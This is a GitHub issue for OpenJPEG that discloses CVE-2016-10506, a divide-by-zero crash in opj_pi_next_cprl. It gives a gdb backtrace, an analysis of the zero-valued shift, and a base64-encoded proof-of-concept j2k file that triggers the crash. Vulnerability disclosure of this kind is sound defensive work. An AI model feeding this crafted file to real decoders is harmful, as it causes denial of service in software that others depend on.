at /home/username/Desktop/openjpeg/src/bin/jp2/opj_decompress.c:1330
Simple Analysis
The value of comp->dx is 2 and the value of rpx is 31.
The value evaluated from (OPJ_INT32)(comp->dx << rpx) is 0 (2<<31 == 0).
The code pi->x%(OPJ_INT32)(comp->dx<<rpx) will cause a divide-by-zero exception (SIGFPE).
Proof-of-Concept file
Please decode the following content with base64 algorithm.
Then you should save the decoded content to a j2k file to generate the PoC.
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
The text was updated successfully, but these errors were encountered:
trylab
changed the title
division-by-zero (SIGFPE) error in opj_pi_next_cprl function in (line 526 of pi.c)
division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c)
Mar 28, 2016
trylab
changed the title
division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c)
[CVE-2016-10506] division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c)
Aug 30, 2017
Testing Environment
Ubuntu + OpenJPEG (GitHub master, 2016/03/28)
Exception Information
username@ubuntu:~/Desktop/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...done.
(gdb) r -o image.pgm -i crashes/002.j2k
Starting program: ~/Desktop/openjpeg/bin/opj_decompress -o image.pgm -i crashes/002.j2k
Program received signal SIGFPE, Arithmetic exception.
0xb7fb8d01 in opj_pi_next_cprl (pi=0x8090ec0)
at /home/username/Desktop/openjpeg/src/lib/openjp2/pi.c:526
526 if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) ||
((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){
(gdb) p comp->dx
$1 = 2
(gdb) p rpx
$2 = 31
(gdb) bt
#0 0xb7fb8d01 in opj_pi_next_cprl (pi=0x8090ec0)
#1 0xb7fbc4cc in opj_pi_next (pi=0x8090ec0)
#2 0xb7fc0b8d in opj_t2_decode_packets (p_t2=0x8090878, p_tile_no=0, p_tile=0x80658d0,
#3 0xb7fc6368 in opj_tcd_t2_decode (p_tcd=0x8065890, p_src_data=0x80668d8 "\337\aV",
#4 0xb7fc5d17 in opj_tcd_decode_tile (p_tcd=0x8065890, p_src=0x80668d8 "\337\aV",
#5 0xb7fa832a in opj_j2k_decode_tile (p_j2k=0x8060298, p_tile_index=0,
#6 0xb7fac369 in opj_j2k_decode_tiles (p_j2k=0x8060298, p_stream=0x8060170, p_manager=0x80601e4)
#7 0xb7fa661e in opj_j2k_exec (p_j2k=0x8060298, p_procedure_list=0x8062420,
#8 0xb7facaf9 in opj_j2k_decode (p_j2k=0x8060298, p_stream=0x8060170,
#9 0xb7fb1aad in opj_jp2_decode (jp2=0x8060210, p_stream=0x8060170,
#10 0xb7fb6c79 in opj_decode (p_codec=0x80601b8, p_stream=0x8060170, p_image=0x8065cc0)
#11 0x0804c2c0 in main (argc=5, argv=0xbffff124)
Simple Analysis
The value of comp->dx is 2 and the value of rpx is 31.
The value evaluated from (OPJ_INT32)(comp->dx << rpx) is 0 (2<<31 == 0).
The code pi->x%(OPJ_INT32)(comp->dx<<rpx) will cause a divide-by-zero exception (SIGFPE).
Proof-of-Concept file
Please decode the following content with base64 algorithm.
Then you should save the decoded content to a j2k file to generate the PoC.
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAAAtanAyaAAAABZpaGRyAAAAIAAAACAA
AweHAAAAAAAPY29scgEAAAAAABAAAAFnanAyY/9P/1EALwAAAAAAAQAAACAAAAAAAAAAAIAAACAA
AAAgAAAAAAAAAAAAAwcCAQcBAYoBAf9SAAwABAABAREEBIAB/1wABEBA/2QAJQABQ3JlYXRlZCBi
eSBPcGVuSlBFRyB2ZXJzaWZ0eXAuMS4w/5AACgAAAAAA7wAB/5PfB1YANB/WzgwnT0scoB/vuZfg
c1PvCOOcZjXu94sFdFbBplUpDNQKo/J/xlMus9LPf6OB3S2g7cWVduNF1Jaz7rIDsiUuZP97i6v6
AKLEZkELDIYYc/9zmmka8yiifaZFEnVtgpHmcWvWIj909OzjqMTdl/xjGiEA30lKlsnQgHvkAAAA
DCQlU8IGCRzPVltBDquXVV1SKEgCZ6AAAL//MDWwLWWTjY66dD2zcDL4QNwgyHZAed8ygGb/NYsD
EkIdgqz2vhAr2q6hLHANUHiJLHTG3LUbzHETySr/f/9//3//2Q==
Credit
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
The text was updated successfully, but these errors were encountered: